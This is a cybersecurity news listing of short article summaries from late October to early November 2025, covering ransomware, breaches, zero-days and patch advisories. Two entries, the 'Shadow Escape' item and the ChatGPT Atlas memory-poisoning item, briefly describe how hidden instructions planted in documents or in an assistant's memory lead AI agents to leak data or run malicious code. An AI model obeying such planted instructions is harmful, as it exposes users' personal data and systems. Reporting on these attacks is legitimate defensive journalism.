Nov 3, 2025 · 5 min read

Cl0p Ransomware Exploits Oracle EBS Zero-Day in Active Attacks

The notorious Cl0p ransomware gang is actively exploiting a critical zero-day vulnerability, CVE-2025-61882, in Oracle's E-Business Suite (EBS) to gain initial access to corporate networks. The complex flaw, which allows for remote code execution, has already been linked to at least two major security incidents, including a breach at Harvard University. With mass exploitation now being reported, organizations using Oracle EBS are at immediate and significant risk and are urged to apply mitigations immediately.

Nov 3, 2025 · 8 min read

Everest Ransomware Hits Swedish Power Grid Operator, Steals 280GB of Data

Sweden's national electricity operator, Svenska kraftnät, has confirmed a data breach following a claim by the Everest ransomware group. The attackers alleged on their dark web leak site that they had stolen 280 GB of internal data. Svenska kraftnät stated that the attack was confined to an external file transfer system and that the nation's core power grid operations and electricity supply were not affected. An investigation is underway to determine the scope of the compromised data.

Nov 2, 2025 · 5 min read

Penn Data Breach: Hacker Claims 1.2M Donor Records Stolen, Exposes "Terrible Security"

A threat actor has claimed responsibility for a massive data breach at the University of Pennsylvania, asserting they have stolen the personal and financial data of 1.2 million donors and alumni. The breach was first revealed after offensive emails were sent from a university system hosted on Salesforce Marketing Cloud. The attacker claims to have gained initial access via a compromised employee single sign-on (SSO) account, which provided a gateway to sensitive platforms including Salesforce, Qlik, SAP, and SharePoint. Data samples, including highly sensitive demographic and financial information, were shared to substantiate the claims, highlighting severe security lapses at the institution.

Nov 2, 2025 · 6 min read

Polish Government Confirms "Very Serious" Data Breach at SuperGrosz Loan Platform

Polish authorities, led by the Deputy Prime Minister, have confirmed a "very serious" data breach at the online loan platform SuperGrosz. The attack resulted in the theft of a vast repository of sensitive customer information, including full names, national identification (PESEL) numbers, ID card details, bank account numbers, and detailed employment information. Poland's national cybersecurity teams have launched a full investigation, and the government has issued a public warning urging affected customers to take immediate security measures to prevent identity theft, such as blocking their PESEL numbers.

Nov 2, 2025 · 5 min read

Google Patches Critical Zero-Click RCE Flaw in Android; Millions of Devices at Risk

Google's November 2025 Android Security Bulletin includes a patch for a critical zero-click remote code execution (RCE) vulnerability, tracked as CVE-2025-48593. The flaw, residing in the Android System component, affects Android versions 13, 14, 15, and 16, and allows remote attackers to compromise a device without any user interaction. Due to its severity and zero-click nature, the vulnerability poses a severe risk to users. The update also addresses a high-severity privilege escalation flaw, CVE-2025-48581. Users are urged to install the update as soon as it becomes available.

Nov 2, 2025 · 4 min read

"SleepyDuck" RAT Emerges in Open VSX Marketplace via Malicious Update

A new remote access trojan (RAT) named "SleepyDuck" has been discovered in the Open VSX marketplace, a popular repository for IDE extensions. A seemingly benign developer extension, 'juan-bianco.solidity-vlang', was updated on November 1, 2025, to include the malware after it had already been downloaded thousands of times. SleepyDuck activates when a user opens a new editor window or a Solidity file. In a sophisticated twist, the malware uses an Ethereum smart contract for a resilient and dynamic command-and-control (C2) infrastructure, allowing it to fetch updated C2 server addresses from the blockchain.

Nov 2, 2025 · 5 min read

Samsung's November Security Update Patches 45 Vulnerabilities, Including Critical Android Flaws

Samsung has released its November 2025 security maintenance release, delivering patches for 45 vulnerabilities affecting its Galaxy smartphones and tablets. The update incorporates Google's latest Android patches, including a fix for the critical zero-click RCE vulnerability CVE-2025-48593. Additionally, the release addresses 9 Samsung-specific vulnerabilities (SVEs), including high-severity flaws in the fingerprint trustlet and image codec library, as well as 11 security issues in its Exynos chipsets. Users are advised to install the update promptly.

Nov 2, 2025 · 4 min read

openSUSE Patches Moderate-Severity Flaws in X.Org Server

The openSUSE project released a security advisory on November 1, 2025, to address three moderate-severity vulnerabilities in the xorg-x11-server package for its Tumbleweed distribution. The flaws could lead to out-of-bounds memory access, potentially resulting in denial-of-service via server crashes or, in some cases, privilege escalation. Users of openSUSE Tumbleweed are advised to apply the update to mitigate the risks.

Nov 2, 2025 · 3 min read

T-Mobile Enters Credit Card Market with Capital One, Raising Data Security Questions

T-Mobile announced its entry into the financial services sector with the launch of its first-ever credit card, created in partnership with banking giant Capital One. This strategic move will leverage T-Mobile's vast customer base and Capital One's financial infrastructure. The partnership introduces significant cybersecurity and data privacy considerations, as it creates a new, complex data environment merging telecommunications and financial information. Both companies have histories of data breaches, making robust security and compliance with regulations like PCI DSS critical for the new venture's success.

Nov 2, 2025 · 4 min read

CISA Adds Actively Exploited Motex LANSCOPE RCE Flaw to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in Motex's LANSCOPE Endpoint Manager, CVE-2025-61932, to its Known Exploited Vulnerabilities (KEV) catalog following confirmation of active attacks. The flaw, rated 9.3 CVSS, allows for unauthenticated remote code execution on affected endpoints. Attackers have reportedly been weaponizing the vulnerability to install backdoors on victim systems, primarily observed in Japan. Federal agencies are now mandated to patch by November 12, 2025.

Nov 1, 2025 · 4 min read

China-Backed Group Exploits Unpatched Windows Flaw to Spy on EU Diplomats

A China-linked cyber-espionage group, UNC6384, associated with Mustang Panda, is actively exploiting an unpatched Windows UI misrepresentation vulnerability, CVE-2025-9491, to conduct espionage against European diplomatic entities. The campaign, active since September 2025, uses sophisticated phishing emails containing malicious LNK files themed around EU and NATO events. These files trigger a multi-stage attack that deploys the PlugX RAT via DLL side-loading. Despite being reported in 2024 and publicly disclosed in March 2025, Microsoft has decided not to issue a security patch, stating the flaw does not meet its bar for servicing.

Nov 1, 2025 · 5 min read

Akira Ransomware Claims Breach of Apache OpenOffice, Threatens Data Leak

The prolific Akira ransomware group has listed Apache OpenOffice, a popular open-source office suite, as a victim on its dark web data leak site. The threat actors claim to have exfiltrated 23 gigabytes of data from the Apache Software Foundation, including financial records, internal documents, and employee personally identifiable information (PII). As of November 1, 2025, the alleged breach has not been confirmed by the Apache Software Foundation, leaving the scope and authenticity of the claim unverified.

Nov 1, 2025 · 4 min read

Ukrainian Conti Ransomware Affiliate Extradited to US

Oleksii Lytvynenko, a 43-year-old Ukrainian national, has been extradited from Ireland to the United States for his alleged role in the notorious Conti ransomware syndicate. He pleaded not guilty in a Tennessee federal court to charges of conspiracy to commit computer fraud and extortion. Lytvynenko is accused of participating in attacks by the Conti group, which extorted over $150 million from more than 1,000 victims worldwide. If convicted, he faces a potential prison sentence of up to 25 years.

Nov 1, 2025 · 4 min read

New 'KYBER' Ransomware Emerges with Advanced Encryption and Data-Driven Extortion Model

Cybersecurity researchers at CYFIRMA have identified a new ransomware strain named KYBER, which employs a sophisticated hybrid encryption scheme including the post-quantum Kyber1024 algorithm. The ransomware, discovered on underground forums, follows a double-extortion model, threatening to leak stolen data if victims do not establish contact within two weeks. KYBER targets Windows systems in English-speaking countries, with a focus on high-value sectors like Aerospace & Defense and technology. Researchers warn it may evolve into a full-fledged Ransomware-as-a-Service (RaaS) operation.

Nov 1, 2025 · 4 min read

Australia Warns of 'BADCANDY' Malware Targeting Unpatched Cisco Devices

The Australian Signals Directorate (ASD) has issued an urgent warning about an ongoing cyberattack campaign deploying a new malware implant called 'BADCANDY' on unpatched Cisco IOS XE devices. The attackers are exploiting the critical remote code execution vulnerability CVE-2023-20198 (CVSS 10.0) to gain full control of routers and switches. The ASD reports a recent spike in activity, with 150 Australian devices infected in October 2025 alone. The malware, a non-persistent web shell, is being actively redeployed by attackers even after removal.

Nov 1, 2025 · 4 min read

New "Airstalk" Malware Abuses VMware API in Nation-State Supply Chain Attack

A newly identified malware strain, "Airstalk," has been deployed in a sophisticated supply chain attack believed to be sponsored by a nation-state actor. The activity, tracked as the cluster CL-STA-1009, is notable for its novel command-and-control (C2) technique: it misuses the API of VMware's Workspace ONE Unified Endpoint Management (UEM), formerly AirWatch, to communicate covertly. The malware is also signed with a likely stolen digital certificate to evade detection, pointing to a well-resourced and stealthy adversary.

Nov 1, 2025 · 5 min read

Data Breaches Hit Toys 'R' Us Canada, Askul, and Verisure

A wave of data breaches has impacted several consumer-facing companies globally. Toys "R" Us Canada has had customer records leaked on the dark web. Japanese retailer Askul suffered a disruptive ransomware attack that halted operations and may have resulted in a data leak. Additionally, Swedish security firm Verisure disclosed a breach affecting 35,000 customers via a third-party vendor, and U.S.-based Jewett-Cameron Trading reported the theft of financial documents.

Oct 31, 2025 · 4 min read

CISA KEV Alert: XWiki RCE Flaw Actively Exploited for Cryptomining

The US Cybersecurity and Infrastructure Security Agency (CISA) has added a critical remote code execution (RCE) vulnerability in the XWiki enterprise wiki platform, CVE-2025-24893, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, rated 9.8 on the CVSS scale, allows an unauthenticated attacker to execute arbitrary code by injecting malicious Groovy expressions into a search query. Security researchers at VulnCheck have confirmed active exploitation in the wild, with attackers using the vulnerability to deploy cryptocurrency mining malware. CISA has mandated that federal agencies patch the flaw promptly due to the immediate risk.

Oct 31, 2025 · 4 min read

VMware Zero-Day LPE Flaw Exploited by China-Linked Actor Added to CISA KEV

CISA has added CVE-2025-41244, a high-severity local privilege escalation (LPE) vulnerability in VMware products, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw affects VMware Aria Operations and VMware Tools and allows a non-administrative user on a virtual machine to gain root privileges. The vulnerability has been exploited as a zero-day since mid-October 2024, with attribution pointing to UNC5174, a suspected China-linked threat actor. The flaw is an untrusted search path vulnerability, and a public proof-of-concept is available, increasing the risk to unpatched systems.

Oct 31, 2025 · 4 min read

Finance Execs Targeted in Sophisticated LinkedIn Phishing Scheme with Fake Board Invites

A sophisticated phishing campaign is targeting finance executives through LinkedIn direct messages, using fake invitations to an executive board as a lure. The multi-stage attack, detailed by Push Security, aims to harvest Microsoft credentials and session cookies to bypass MFA. The attack chain leverages trusted services to appear legitimate, starting with a Google open redirect, leading to a fraudulent portal hosted on Google Firebase, and using a Cloudflare CAPTCHA to evade security bots. This non-email-based phishing vector is reportedly becoming significantly more common, accounting for over a third of recent attempts tracked by researchers.

Oct 31, 2025 · 5 min read

Telecom Giant Ribbon Communications Breached by Nation-State Actor for 10 Months

Telecommunications provider Ribbon Communications has disclosed a significant security breach by a suspected nation-state actor. According to an SEC filing, the attackers first gained access in December 2024 and remained undetected for nearly a year until September 2025. The company, which serves critical clients including the U.S. Department of Defense and major carriers like Verizon, stated the actor accessed several customer files stored on two laptops outside the main network. The long dwell time and the nature of the target suggest a sophisticated espionage campaign, raising serious concerns about supply chain security in the telecommunications sector.

Oct 31, 2025 · 5 min read

Canada Issues National Alert as Hacktivists Target Critical Infrastructure

The Canadian Centre for Cyber Security, along with the RCMP, has issued a national alert warning of increasing cyberattacks by hacktivists against the nation's critical infrastructure. The advisory follows multiple successful breaches of internet-accessible Industrial Control Systems (ICS) in sectors like water treatment, food, and manufacturing. The alert notes a tactical shift by hacktivists from simple DDoS attacks to more disruptive intrusions into Operational Technology (OT). Authorities are urging organizations, especially in under-regulated sectors, to immediately inventory and secure exposed ICS/OT devices, recommending VPNs with 2FA and enhanced monitoring to mitigate the risk to public safety.

Oct 31, 2025 · 4 min read

Conduent Data Breach: 10 Million+ Individuals' Personal & Medical Data Exposed

Conduent Business Services, a major contractor for U.S. government agencies, has disclosed a massive data breach impacting over 10 million individuals. The incident, which occurred between October 2024 and January 2025, involved an unauthorized third party gaining access to Conduent's network and exfiltrating files. The compromised data is highly sensitive, including names, Social Security numbers, medical information, and health insurance details. The breach has affected residents across numerous states, including Texas, Washington, and California, and has triggered a legal investigation by the law firm Edelson Lechtzin LLP into the company's data privacy practices.

Oct 31, 2025 · 4 min read

Qilin Ransomware Claims 700 Victims in 2025, Becoming Top Global Threat

The Qilin ransomware group has dramatically escalated its activities in 2025, claiming over 700 attacks to become the year's most prolific ransomware operation. Operating a Ransomware-as-a-Service (RaaS) model, the Russia-based group has far surpassed the activity of 2024's leader, RansomHub. A significant surge in Qilin's attacks followed the shutdown of the RansomHub operation in April 2025, suggesting a migration of affiliates. Qilin aggressively targets critical infrastructure sectors worldwide, including healthcare, finance, and government, using double-extortion tactics.

Oct 30, 2025 · 5 min read

Ad Giant Dentsu's Subsidiary Merkle Hit by Cyberattack, Staff and Client Data Exposed

Global advertising firm Dentsu has confirmed that its US-based customer experience management (CXM) subsidiary, Merkle, was the target of a cyberattack. The company detected 'abnormal activity' on Merkle's network and proactively shut down certain systems to contain the threat. An investigation has confirmed that the incident led to the exposure of both staff and sensitive client data. Merkle, a major player in the CXM industry, handles large volumes of customer data, making it a high-value target for threat actors. The full scope of the breach is still under investigation.

Oct 30, 2025 · 4 min read

EY Leaks 4TB+ SQL Database Packed with Corporate Secrets via Cloud Misconfiguration

Consulting giant EY (Ernst & Young) inadvertently exposed a massive, 4TB+ SQL Server backup file to the public internet due to a cloud storage misconfiguration. The unencrypted `.BAK` file, discovered by researchers at Neo Security, contained a treasure trove of highly sensitive internal data, including API keys, service account passwords, session tokens, and user credentials. The incident highlights the severe risks associated with cloud service misconfigurations, where tools designed for convenience can lead to catastrophic data exposure if not secured properly. Neo Security described the leak as equivalent to finding the 'master blueprint and physical keys to a vault.'

Oct 30, 2025 · 5 min read

IncRansom Claims 20TB Data Heist from Evolve Mortgage Services

The 'incransom' ransomware group has claimed responsibility for a significant data breach at Evolve Mortgage Services, listing the company on its dark web leak site on October 30, 2025. The attackers allege they have stolen over 20 terabytes of data, including 2 terabytes of databases containing sensitive PII such as Social Security numbers, client IDs, and full credit histories dating back to 2016. The group is using a pure data-theft extortion model, threatening to leak the data after claiming the company refused to negotiate. This incident highlights the ongoing threat of data extortion attacks against the U.S. financial services sector.

Oct 30, 2025 · 5 min read

New 'logins[.]zip' Infostealer Claims 99% Credential Theft in 12 Seconds Using Zero-Days

A new Malware-as-a-Service (MaaS) infostealer named 'logins[.]zip' is being sold on the clear web, boasting incredible speed and efficiency. According to a report from Hudson Rock, its authors claim it can exfiltrate 99% of passwords and cookies from a victim's machine in under 12 seconds. The stealer's key selling point is its alleged use of two Chromium zero-day exploits, which allow it to steal credentials without needing admin rights. The service, sold for $150/month, provides a browser-based builder for creating polymorphic stubs and targets logins, cookies, payment cards, and crypto wallets.

Oct 30, 2025 · 5 min read

UK's NCSC Warns 'Nationally Significant' Cyber Attacks Have More Than Doubled

The UK's National Cyber Security Centre (NCSC) has released its 2025 Annual Review, revealing a stark increase in major cyber threats. The agency handled 204 'nationally significant' incidents in the past year, more than double the 89 from the previous year. Ransomware remains the most acute threat, particularly to the UK's Critical National Infrastructure (CNI). The report highlights a growing gap between the escalating threats from APTs and cybercriminals and the nation's collective defenses, prompting the NCSC to urge all UK businesses to make cyber resilience a board-level priority and adopt foundational security controls.

Oct 29, 2025 · 5 min read

"Shadow Escape": New Zero-Click Attack Steals Data from ChatGPT, Claude, and Gemini

A novel zero-click attack vector named "Shadow Escape" has been discovered by researchers at Operant, capable of silently exfiltrating sensitive data from popular AI agents like OpenAI's ChatGPT, Anthropic's Claude, and Google's Gemini. The attack exploits the Model Context Protocol (MCP) by embedding hidden malicious instructions within seemingly benign documents. This allows for the theft of personally identifiable information (PII) without any user interaction, bypassing traditional security tools and posing a significant threat to enterprises adopting agentic AI.

Oct 29, 2025 · 5 min read

Massive 70TB Data Leak at Tata Motors from Exposed AWS Keys

A colossal security failure at Tata Motors has resulted in the exposure of over 70 terabytes of sensitive corporate data, customer information, and infrastructure details. The breach, which was first identified in 2023, stemmed from multiple critical misconfigurations, including plaintext Amazon Web Services (AWS) access keys hardcoded on a customer-facing website. These credentials provided unrestricted access to numerous S3 buckets containing a vast trove of data, including customer PII and financial records.

Oct 29, 2025 · 5 min read

Herodotus Android Malware Mimics Human Typing to Bypass Biometric Security

A new Android banking trojan named Herodotus has emerged, offered as a Malware-as-a-Service (MaaS) by a threat actor known as 'K1R0'. The malware is notable for its novel evasion technique: it mimics human typing behavior by introducing random delays during remote control sessions. This method is specifically designed to defeat behavioral biometric security systems that analyze user interaction patterns to detect fraud. Active campaigns have been observed targeting banking and crypto app users in Italy and Brazil.

Oct 29, 2025 · 4 min read

Chrome Zero-Day Exploited by "Mem3nt0 mori" APT to Deploy Spyware

A critical zero-day vulnerability in Google Chrome, CVE-2025-2783, has been actively exploited in a targeted espionage campaign dubbed "Operation ForumTroll." The campaign, which began in March 2025, is attributed to the advanced persistent threat (APT) group known as "Mem3nt0 mori." The attackers used the exploit to deliver a sophisticated backdoor called LeetAgent, a spyware tool developed by the Italian vendor Memento Labs, primarily targeting organizations in Russia and Belarus.

Oct 29, 2025 · 5 min read

Qantas Data Breach: 5.7M Customer Records Leaked in Salesforce Supply Chain Attack

The personal data of 5.7 million Qantas Airways customers has been published on the dark web by a group calling itself 'Scattered Lapsus$ Hunters'. The leak, which occurred after a ransom deadline passed on October 11, 2025, is part of a broader supply chain attack that compromised a third-party Salesforce system used by one of the airline's offshore call centers. The compromised data includes names, emails, frequent flyer information, and for some, addresses, phone numbers, and dates of birth. The attack vector involved social engineering, with hackers impersonating Salesforce employees to gain access. Qantas confirmed the breach, stating it is one of 39 companies affected by the campaign and that financial data and passwords were not compromised. The incident has prompted warnings of secondary phishing attacks and a class-action complaint.

Oct 29, 2025 · 7 min read

Clop Ransomware Breaches American Airlines Subsidiary Envoy Air, Exploiting Oracle EBS Flaw

Envoy Air, a regional airline owned by American Airlines, has confirmed it was a victim of a hacking campaign orchestrated by the Clop ransomware group. The attackers exploited vulnerabilities in Oracle's E-Business Suite (EBS) to gain access and exfiltrate data. While Envoy Air states that no sensitive customer or personal data was compromised, the breach involved some business information and commercial contacts. Clop has listed American Airlines among more than 60 victims of its recent campaign targeting unpatched Oracle systems, threatening to leak stolen data if ransoms are not paid.

Oct 28, 2025 · 5 min read

Massive Breach at Kenyan Health Platform M-TIBA Exposes 4.8 Million Patients

A threat actor named 'Kazu' has claimed responsibility for a catastrophic data breach against M-TIBA, a major mobile health platform in Kenya backed by Safaricom. The hacker alleges the theft of 2.15 terabytes of data, impacting up to 4.8 million users. The compromised information reportedly includes a vast trove of personally identifiable information (PII) and highly sensitive protected health information (PHI), such as patient diagnoses and treatment records from nearly 700 healthcare facilities. A 2GB data sample has already been leaked to substantiate the claim.

Oct 28, 2025 · 5 min read

CISA Warns of Critical Flaws in Global Fuel Gauge Systems, Risking Infrastructure Disruption

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a critical advisory for two vulnerabilities in Veeder-Root's TLS4B Automatic Tank Gauge (ATG) systems, which are used globally to monitor fuel levels. The most severe flaw, CVE-2025-58428, has a CVSS score of 9.9 and could allow a remote, authenticated attacker to execute system-level commands, potentially causing widespread disruption to fuel infrastructure. A second flaw, CVE-2025-55067, relates to the 'Year 2038' problem and could cause denial-of-service conditions.

Oct 28, 2025 · 5 min read

Critical Apache Tomcat Flaws Expose Servers to RCE and Console Hijacking

The Apache Software Foundation has released patches for two critical vulnerabilities, CVE-2025-55752 and CVE-2025-55754, affecting Apache Tomcat versions 9, 10, and 11. The most severe flaw, CVE-2025-55752, is a directory traversal bug that can be escalated to remote code execution (RCE) if non-default settings like PUT requests are enabled. The second flaw could allow for console manipulation on Windows systems. Administrators are urged to upgrade to the latest versions immediately.

Oct 28, 2025 · 5 min read

North Korea's BlueNoroff APT Targets macOS Users with New 'GhostCall' Malware

The North Korean advanced persistent threat (APT) group BlueNoroff has been linked to two new sophisticated campaigns, 'GhostCall' and 'GhostHire,' which specifically target macOS users. According to Kaspersky, the financially motivated group, a subset of the Lazarus Group, is targeting venture capitalists and Web3 developers with fake Zoom and Microsoft Teams clients, AI-enhanced social engineering, and a new suite of malware designed to steal cryptocurrency. Victims have been identified globally, including in Japan, Italy, France, and Singapore.

Oct 28, 2025 · 5 min read

U.S. Coast Guard Poised for 'Generational Change' in Maritime Cybersecurity with $25B Funding

The U.S. Coast Guard (USCG) is set for a 'generational change' in maritime cybersecurity, according to an analysis by the Center for Strategic and International Studies (CSIS). Nearly $25 billion in new funding, combined with expanded regulatory authorities, will allow the USCG to comprehensively modernize its systems, implement a zero-trust architecture, and enforce new cybersecurity standards across the entire U.S. Marine Transportation System. The move signals a major strategic shift, elevating cyberspace to an operational domain on par with air, land, and sea.

Oct 28, 2025 · 4 min read

Over-Privileged Active Directory Domain-Join Accounts Create Major Security Risk

A new security analysis reveals that Active Directory (AD) domain-join accounts, even when configured according to official guidance, often inherit excessive privileges that create a reliable pathway for attackers to achieve full domain compromise. These specialized accounts, used for automated machine provisioning, can have their credentials exposed during deployment. Attackers can then abuse the account's powerful default permissions, such as object ownership and rights related to Resource-Based Constrained Delegation (RBCD), to escalate privileges and take over computer objects.

Oct 28, 2025 · 5 min read

Microsoft Report: AI-Generated Phishing Now 4.5x More Effective, Bypassing Traditional Defenses

According to the Microsoft 2025 Digital Defense Report, the effectiveness of phishing attacks has surged with the adoption of artificial intelligence. AI-generated emails now achieve a 54% click-through rate, 4.5 times higher than traditional methods. The report, covering July 2024 to June 2025, also highlights a 32% increase in identity-based attacks and the growing use of AI by nation-state actors for disinformation. Microsoft stresses that phishing-resistant MFA remains the most effective defense, blocking over 99% of identity attacks.

Oct 27, 2025 · 5 min read

CISA Orders Federal Agencies to Patch New Actively Exploited Vulnerability

On October 22, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a new, unspecified vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. This action confirms that the flaw is being actively exploited in the wild by malicious actors. Under Binding Operational Directive (BOD) 22-01, all Federal Civilian Executive Branch (FCEB) agencies are now required to remediate this vulnerability by a specific deadline to protect federal networks. While the CVE identifier was not immediately released, the alert serves as a critical warning to all organizations to prioritize its patching.

Oct 27, 2025 · 5 min read

18 Minutes to Mayhem: Ransomware Attacks Now Fully Automated, Slashing Defender Response Time

A new report from ReliaQuest reveals a dramatic acceleration in ransomware attacks, with the average time from initial access to lateral movement ('breakout time') plummeting to just 18 minutes. This is a significant decrease from 48 minutes in 2024, driven by the adoption of automation and AI by 80% of Ransomware-as-a-Service (RaaS) groups. The report highlights the Qilin ransomware gang as a prime example, whose platform automates key attack phases like discovery, backup deletion, and encryption. Other groups like LockBit are also integrating AI to enhance their operations, creating a hyper-competitive landscape where speed and automation are paramount. This shrinking response window poses a monumental challenge for security teams, demanding automated detection and response capabilities to counter the threat.

Oct 27, 2025 · 7 min read

Critical Adobe Commerce Flaw Under Active Exploitation, CISA Warns

A critical improper input validation vulnerability in Adobe Commerce and Magento, tracked as CVE-2025-54236, is being actively exploited in the wild. Dubbed 'SessionReaper,' the flaw allows an unauthenticated remote attacker to hijack user sessions via the REST API, leading to potential web shell deployment and complete store takeover. CISA has added the vulnerability to its KEV catalog, and with reports suggesting over 60% of Magento stores remain unpatched, immediate action is urged for all administrators.

Oct 27, 2025 · 5 min read

ChatGPT Flaw Allows 'Memory Poisoning' via CSRF Attack

A novel vulnerability discovered in OpenAI's ChatGPT Atlas web browser allows attackers to perform 'memory poisoning' through a Cross-Site Request Forgery (CSRF) attack. Researchers at LayerX Security found that this flaw can be used to invisibly inject malicious instructions into ChatGPT's persistent 'Memory' feature. These instructions survive across sessions and devices, and can be triggered by a user's normal prompts to execute malicious code, potentially leading to account takeover or malware deployment.

Oct 27, 2025 · 4 min read

APT-C-60 Escalates 'SpyGlace' Campaign Against Japan

The South Korea-aligned cyber-espionage group APT-C-60 has significantly intensified its campaign against Japanese organizations in the third quarter of 2025. According to JPCERT/CC and Cyble, the group has deployed at least three new versions of its custom 'SpyGlace' backdoor. The attackers have evolved their tactics, now attaching malicious VHDX files directly to phishing emails and abusing legitimate services like GitHub and StatCounter for stealthy command-and-control communications and malware delivery, making detection more challenging.

Oct 27, 2025 · 4 min read

Healthcare Sector Rocked by Breaches at ModMed, LifeBridge, and Right at Home

The healthcare sector continues to be a prime target for cyberattacks, with recent data breaches announced by Electronic Health Record (EHR) provider Modernizing Medicine (ModMed), home healthcare provider Right at Home, and Baltimore-based LifeBridge Health. The incidents, which include a ransomware attack claimed by the Sinobi group and a third-party breach via Oracle Health, have exposed a vast range of sensitive Protected Health Information (PHI), including Social Security numbers, medical diagnoses, and financial data.

Oct 27, 2025 · 4 min read

DDoS Attack on Russian Food Agency Cripples National Supply Chains

Russia's federal agency for veterinary and phytosanitary surveillance, Rosselkhoznadzor, has been targeted by a large-scale distributed denial-of-service (DDoS) attack starting October 22, 2025. The attack crippled the agency's critical electronic certification systems, including the 'Mercury' platform, which is essential for tracking animal products. The outage caused significant delays in food shipments from major producers of meat, milk, and baby food across the nation, highlighting the vulnerability of critical national infrastructure to cyberattacks. Russian telecom providers are working to mitigate the attack, for which no group has claimed responsibility.

Oct 26, 2025 · 4 min read

SafePay Ransomware Hits German Surveillance Firm Xortec, Sparking Supply Chain Fears

The SafePay ransomware group has claimed responsibility for a cyberattack against Xortec GmbH, a German provider of professional video surveillance solutions. The group has listed Xortec on its data leak site with a payment deadline of October 27, 2025. This attack raises significant supply chain concerns, as a compromise of a value-added distributor like Xortec could potentially lead to backdoored hardware or software being deployed in sensitive client environments. SafePay is a relatively new but aggressive ransomware operation known for its rapid double-extortion attacks.

Oct 26, 2025 · 5 min read

Google Issues Emergency Patch for Critical Chrome RCE Flaw Found by AI

Google has released an emergency security update for the Chrome browser, addressing a high-severity remote code execution (RCE) vulnerability in its V8 JavaScript engine. The flaw, tracked as CVE-2025-12036, was discovered by Google's internal AI-driven research project, 'Big Sleep.' Successful exploitation could allow an attacker to execute arbitrary code on a user's system by tricking them into visiting a malicious website. The patch has been rolled out for Windows, macOS, and Linux users, who are urged to update their browsers immediately to mitigate the high-severity threat.

Oct 25, 2025 · 4 min read

Nation-State and Financial Cybercrime Blur as Industrial Sector Becomes Top Target

A new report from Trellix reveals a significant convergence between the tactics of nation-state actors and financially motivated cybercriminals, with both increasingly leveraging AI-powered tools. The industrial sector has emerged as the most targeted industry, accounting for over 36% of attacks analyzed between April and September 2025. The research highlights the dominance of PowerShell as a key attack tool, used in nearly 78% of ransomware campaigns. The United States remains the most targeted nation, and the ransomware landscape is highly fragmented, with the top five groups accounting for less than 40% of all incidents.

Oct 25, 2025 · 5 min read

India Enacts New Telecom Cybersecurity Rules for IMEI and Mobile Number Validation

India's Ministry of Communications has enacted new cybersecurity regulations for its telecommunications sector, effective October 22, 2025. The 'Telecommunications (Telecom Cyber Security) Amendment Rules, 2025' introduce two key measures: the establishment of a centralized Mobile Number Validation (MNV) platform to secure digital communications, and stricter controls on International Mobile Equipment Identity (IMEI) numbers. The new IMEI rules prohibit the assignment of already-used IMEIs to new devices and mandate that sellers and buyers of used devices verify the IMEI against a national database to combat theft and tampering.

Oct 25, 2025 · 4 min read

UN Convention Against Cybercrime Signed in Hanoi Amid Global Endorsement and Controversy

In a landmark event in Hanoi, Vietnam, representatives from nearly 100 UN member states have signed the United Nations Convention against Cybercrime. Adopted by the UN General Assembly in December 2024, this treaty, also known as the Hanoi Convention, establishes the first global legal framework for international cooperation in combating a wide array of online crimes, including fraud, child exploitation, and money laundering. While hailed as a milestone by the UN Secretary-General, the event drew criticism from rights groups over the choice of Vietnam as the host, and a major tech industry group, the Cybersecurity Tech Accord, declined to attend.

Oct 25, 2025 · 4 min read

EU Accuses Meta and TikTok of Breaching Digital Services Act Transparency Rules

The European Commission has issued preliminary findings that Meta's platforms (Facebook and Instagram) and TikTok have breached their obligations under the Digital Services Act (DSA). The Commission alleges the companies failed to provide adequate access to public data for researchers, hindering independent scrutiny of their platforms. Furthermore, Meta is accused of using 'dark patterns' and creating a burdensome process for users to report illegal content. These are initial findings, and both companies will have the opportunity to respond and propose remedies before any final decision or penalties are imposed.

Oct 25, 2025 · 4 min read

Ransomware Attacks on Critical Industries Skyrocket by 34%, KELA Reports

A new report from cyber intelligence firm KELA reveals a staggering 34% year-over-year increase in ransomware attacks targeting critical industries between January and September 2025. These vital sectors, including manufacturing, healthcare, and energy, accounted for half of all 4,701 recorded global incidents. The United States was the most heavily targeted nation. The report also highlights the consolidation of the ransomware ecosystem, with just five groups—Qilin, Clop, Akira, Play, and SafePay—responsible for nearly a quarter of all attacks.

Oct 25, 2025 · 5 min read

Patch Now: Microsoft Fixes 170+ Flaws, Including Four Actively Exploited Zero-Days

Microsoft has released its October 2025 Patch Tuesday update, a massive release fixing over 170 security vulnerabilities across its product ecosystem. The update is critical for all users, as it contains patches for four zero-day vulnerabilities that are being actively exploited in the wild. Two of these flaws, CVE-2025-24990 and CVE-2025-59230, allow for local privilege escalation to Administrator or SYSTEM rights. CISA has added the exploited vulnerabilities to its KEV catalog, mandating urgent patching for federal agencies.

Oct 25, 2025 · 5 min read

UK Gov & NCSC Issue Urgent Warning to FTSE 350 Boards on Cyber Resilience

The UK's National Cyber Security Centre (NCSC) and government ministers have sent a formal letter to the leaders of all FTSE 350 companies, demanding that cyber resilience be treated as a top board-level priority. The call to action follows the NCSC's latest annual review, which reported a 50% rise in 'highly significant' incidents and more than double the previous year's count of nationally significant ones. The letter outlines three practical steps: adopt the government's Cyber Governance Code, enroll in the NCSC's Early Warning service, and mandate Cyber Essentials certification throughout supply chains.

Oct 24, 2025 · 5 min read

Google Patches 6th Actively Exploited Chrome Zero-Day of 2025

Google has issued an emergency security update for its Chrome web browser to address CVE-2025-10585, a high-severity type confusion vulnerability in the V8 JavaScript engine. This marks the sixth time in 2025 that Google has patched a Chrome zero-day vulnerability that was being actively exploited in the wild. The flaw could allow an attacker to achieve arbitrary code execution on a victim's machine by tricking them into visiting a malicious website. All users of Chrome and other Chromium-based browsers are urged to update immediately.

Oct 24, 2025 · 5 min read

Agenda Ransomware Evolves, Hits Critical Infrastructure

The Agenda ransomware group, also known as Qilin, is escalating its attacks by targeting critical infrastructure sectors with evolved tactics. According to research from Trend Micro, the ransomware-as-a-service (RaaS) operation is using a cross-platform approach, abusing legitimate remote management tools and deploying Linux-based ransomware on Windows hosts to evade security. The group also employs Bring Your Own Vulnerable Driver (BYOVD) attacks to neutralize endpoint defenses and steals backup credentials to hinder recovery, primarily targeting high-value organizations in the U.S., Canada, and the U.K.

Oct 24, 2025 · 5 min read

